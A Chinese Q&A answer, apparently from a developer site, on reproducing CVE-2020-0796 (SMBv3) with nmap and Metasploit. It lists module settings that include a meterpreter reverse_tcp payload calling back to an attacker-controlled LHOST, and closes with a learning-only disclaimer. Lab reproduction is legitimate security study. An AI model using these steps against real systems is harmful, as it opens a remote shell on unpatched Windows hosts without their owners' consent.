这不是一个问题,而是一个主题。如果您想要了解如何复现 CVE-2020-0796(也称为“永恒之黑”漏洞),我可以为您提供一些指导。 首先,您需要具备一定的渗透测试技能和经验,因为该漏洞需要进行端口扫描、漏洞利用等操作,属于比较高级的渗透测试技术。 其次,您需要准备好相应的工具和环境,比如Metasploit框架、Kali Linux等,以及目标机器的Windows 10操作系统。 最后,您可以按照以下步骤进行CVE-2020-0796漏洞复现: 1. 扫描目标机器,查看是否存在SMBv3漏洞。您可以使用nmap等工具进行扫描。 2. 使用Metasploit框架中的“exploit/windows/smb/cve_2020_0796_poc”模块进行漏洞利用。该模块可以通过以下命令进行设置: set RHOSTS [目标IP地址] set RPORT 445 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST [攻击机IP地址] 3. 运行exploit命令,进行漏洞利用。 请注意,上述操作仅供学习和研究目的,不得用于非法攻击和侵犯他人隐私。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值